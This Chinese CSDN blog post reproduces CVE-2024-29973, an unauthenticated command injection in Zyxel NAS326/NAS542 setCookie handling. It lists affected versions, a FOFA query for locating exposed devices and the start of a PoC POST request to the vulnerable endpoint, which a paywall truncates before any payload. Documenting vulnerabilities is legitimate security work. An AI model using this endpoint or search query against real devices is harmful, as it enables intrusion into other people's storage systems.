Zyxel NAS设备 setCookie 未授权命令注入漏洞复现(CVE-2024-29973)

已于 2024-06-19 10:27:01 修改
阅读量893 收藏
点赞数 7
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2024-06-19 10:26:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/139794875
版权

0x01 产品简介

Zyxel-NAS 是指由 Zyxel Communications Corporation(合勤科技股份有限公司)开发和生产的网络附加存储(Network Attached Storage,简称 NAS)设备。NAS 是一种专门用于存储和共享文件的设备,它通过网络连接到计算机、服务器或其他设备,提供集中式的文件存储和访问功能。

0x02 漏洞概述

Zyxel NAS326 V5.21(AAZF.17)C0之前版本、NAS542 V5.21(ABAG.14)C0之前版本存在操作系统命令注入漏洞,该漏洞源于setCookie参数中存在命令注入漏洞,从而导致未经身份验证的远程攻击者可通过HTTP POST请求来执行某些操作系统 (OS) 命令。

0x03 影响范围

Zyxel NAS326 < V5.21(AAZF.17)C0
Zyxel NAS542 < V5.21(ABAG.14)C0

0x04 复现环境

FOFA:

body="/cmd,/ck6fup6/user_grp_cgi/cgi_modify_userinfo"

0x05 漏洞复现

PoC

POST /cmd,/simZysh/register_main/setCookie HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) C
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 7
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
订阅专栏
ZyXEL-NAS326:合勤科技NAS326现代化2019
05-26
ZyXEL NAS326黑客与现代化 免责声明:对于本指南的任何使用或互动,我概不负责。 提供本指南的目的是为了教育目的,并且还提供有用的最终结果,这就是ZyXELNAS326变得比ZyXEL当前支持的功能更强大。 这一切是如何...
Xsafe#PeiQi-WIKI-POC#Zyxel NBG2105 身份验证绕过 CVE-2021-32972
07-25
Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞描述Zyxel NBG2105 存在身份验证绕过,攻击者通过更改 login参数可用实现
hvv 前网安人必读的漏洞清单(2024年)
2401_84466229的博客
05-28 2026
数字化浪潮席卷全球,安全漏洞的发现和利用频率正以惊人的速度上升,尤其是工业自动化、绿色能源、财经领域、交通系统、国家防务以及医疗行业等关键部门,成为了网络攻击者的主要目标。数据侵犯和勒索软件的攻击层出不穷,凸显了安全漏洞正被黑客用作主要的攻击渠道。本文梳理、分析了 2023 年危害巨大、影响范围广泛、且攻击手法多变的漏洞,旨在为网络安全界的实践者们提供一个详细的漏洞信息概览,帮助安全从业者能够更全面地掌握这些安全威胁,并据此构建更为坚固的安全防线。
用友U8 CRM swfupload 任意文件上传漏洞复现(XVE-2024-8597)
qq_39894062的博客
04-20 644
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
合勤紧急修复NAS设备中的RCE漏洞
smellycat000的专栏
06-05 186
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士合勤 (Zyxel) 网络公司紧急发布安全更新,修复了影响已达生命周期的老旧NAS 设备中的三个严重漏洞。这三个漏洞影响运行固件版本5.21 (AAZF.16) Co及更早版本的NAS326以及影响5.21 (ABAG.13) Co及更早版本的NAS542设备。这三个严重漏洞可使攻击者执行命令注入和远程代码执行攻击。不过其中两个可导致提权和信息泄...
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 767
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
CVE-2022-30525 Zyxel 防火墙远程命令注入漏洞
dust_hk的博客
05-14 4785
摘要 合勤科技(ZyXEL)是国际知名品牌的网络宽带系统及解决方案的供应商,成立于1989年,目前是台湾证交所上市公司(2391),总部设于台湾新竹科学园区。官网:http://www.zyxel.cn。 Zyxel USG FLEX 100(W) 固件版本 5.00 至 5.21 补丁 1、USG FLEX 200 固件版本 5.00 至 5.21 补丁 1、USG FLEX 500 固件版本 5.00 至 5.21 补丁 1、USG FLEX 700 的 CGI 程序中的操作系统命令注入漏洞固件版本
Zyxel防火墙着手解决严重安全漏洞
w3cschools的博客
05-16 819
近日,Zyxel 已着手解决影响 Zyxel 防火墙设备的严重安全漏洞,该漏洞使经身份验证的远程攻击者能够获得任意代码执行。 “某些防火墙版本的 CGI 程序中的命令注入漏洞可能允许攻击者修改特定文件,然后在易受攻击的设备上执行一些操作系统命令,” 该公司在周四发布的一份公告中表示。 网络安全公司 Rapid7于 2022 年 4 月 13 日发现并报告了该漏洞,该公司表示,该漏洞可能允许远程经身份验证的对手以“无人”用户身份在受影响的设备上执行代码。 跟踪为CVE-2022-30525(CV
合勤提醒注意 NAS 设备中的多个严重漏洞
smellycat000的专栏
12-01 487
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士合勤 (Zyxel) 修复了NAS设备中的多个漏洞,其中三个可导致认证攻击者在易受攻击的NAS设备上执行操作系统命令。合勤NAS 系统用于在网络的一个中心位置存储数据,旨在为大量数据服务并提供多种特性如数据备份、媒体流或自定义共享选项。常见的合勤 NAS 用户包括寻求结合数据管理、远程工作和协作特性的中小型企业以及设置数据冗余系统的IT专业人员...
刚刚,合勤科技发布NAS新固件,修复严重的RCE漏洞
smellycat000的专栏
09-07 432
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士今天,网络设备厂商合勤科技 (Zyxel) 提醒客户称,其NAS产品的三个机型受一个严重的远程代码执行漏洞影响。该漏洞的编号为CVE-2022-34747,CVSS v3评分为9.8,是一个“严重”级别的漏洞,不过披露的详情不是很多。合勤科技发布安全公告表示,“合勤科技NAS产品中的某个特定二进制中存在一个格式字符串漏洞,可导致攻击者通过构造的U...
合勤 zyxel gs2200-24 交换机资料 固件
06-20
合勤ZyXEL GS2200-24交换机是一款企业级的网络设备,专为中小企业或大型网络的边缘接入设计。该系列交换机以其高性能、高可靠性以及丰富的管理功能著称。在这个压缩包中,我们找到了与这款交换机相关的各种资料,...
ZyXEL NAS Link Capture-crx插件
04-02
创建右键单击上下文菜单以将链接发送到您的Zyxel Home NAS设备。 作者的注意:如果您获得某种错误“找不到NSA210”,大多数可能是您的计算机或当地网络中的东西是行为不端的。进入扩展的选项并将名称更改为设备的IP...
CTLK_C3000_kernel-config_C3000Z_CZD005_zyxel_
10-02
CTLK_C3000_kernel-config_C3000Z_CZD005_zyxel_ 这个标题揭示了我们正在处理一个与Zyxel C3000Z无线路由器相关的内核配置文件。"Kernel config"指的是操作系统的内核配置,它是操作系统的核心部分,负责管理硬件...
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
LNN0212的博客
07-17 578
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
自建SMTP服务器:如何保障安全稳定的发信?
danplus的博客
07-17 393
自建SMTP服务器虽然可以提供更高的灵活性和控制力,但也需要投入大量的时间和精力来保障其安全和稳定。AokSend,指导您自建SMTP服务器,结合API接口,高效稳定,让邮件营销更加自主可控!
内容安全(深度行为检测技术、IPS、AV、入侵检测方法)
最新发布
Thewei666的博客
07-17 929
区分不同的签名。
防洪墙的安全内容检测+http请求头
代码其实很简单
07-17 333
--1、深度检测技术(DPI和DPF是所有内容检测都必须要用到的技术);DPI--深度包检测,针对完整的数据包,进行内容的识别和检测;---2、DFI ---深度流检测 ,---看名字都知道肯定是对数据流进行检测的技术;--2、IPS ---入侵防御--3、IDS---入侵检测,AV(反病毒) http请求头,http状态码
安全防御-用户认证综合实验
weixin_69863399的博客
07-12 531
生产区访问DMZ需要进行protal认证,设立生产区用户架构,至少包含三个部门,每个部门三个用户,用户统一密码openlab@123,首次登录需要修改密码,用户过期时间设定为10天,用户不允许多人使用。游客区人员不固定,不允许访问DMZ区和生产区,统一使用Guest用户登录,密码Admin@123,游客仅有访问公司门户网站和上网的权利,门户网站地址10.0.3.10。做相关的认证策略,研发部IP地址(10.0.1.20)固定,访问DMZ区使用匿名认证,研发部需要用户绑定IP地址,访问DMZ区使用免认证;
usgv6000设备包下载
09-08
USGv6000设备包下载是指下载用于USGv6000设备的软件包。USGv6000是一款高性能的统一安全网关设备,用于网络安全管理和保护。为了保持设备的最新功能和性能,用户需要定期下载并安装设备包。 首先,用户可以登录到ZyXEL的官方网站或其他授权渠道,找到USGv6000设备包的下载页面。在这个页面上,用户可以找到不同版本和类型的设备包,如固件升级包、特定功能的附加包等。用户可以根据自己的需求和设备的要求选择合适的设备包下载。 然后,用户需要选择下载设备包的方式。一般来说,设备包可以选择通过FTP、HTTP或TFTP等协议进行下载。用户可以根据自己的网络环境和设备的支持情况选择合适的下载方式。 在下载设备包之前,用户需要确保设备的连接稳定,并且有足够的存储空间来存储设备包。同时,用户需要了解下载设备包的流量消耗和时间,以便合理安排网络使用和设备升级。 最后,用户可以点击下载按钮或使用命令行等方式开始下载设备包。下载完成后,用户可以在设备上进行固件升级或安装附加功能,以获得更好的性能和功能。 总的来说,USGv6000设备包下载是用户为了保持设备的最新性能和功能而进行的操作。通过正确选择下载方式和合理安排网络使用,用户可以顺利完成设备包的下载和安装。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值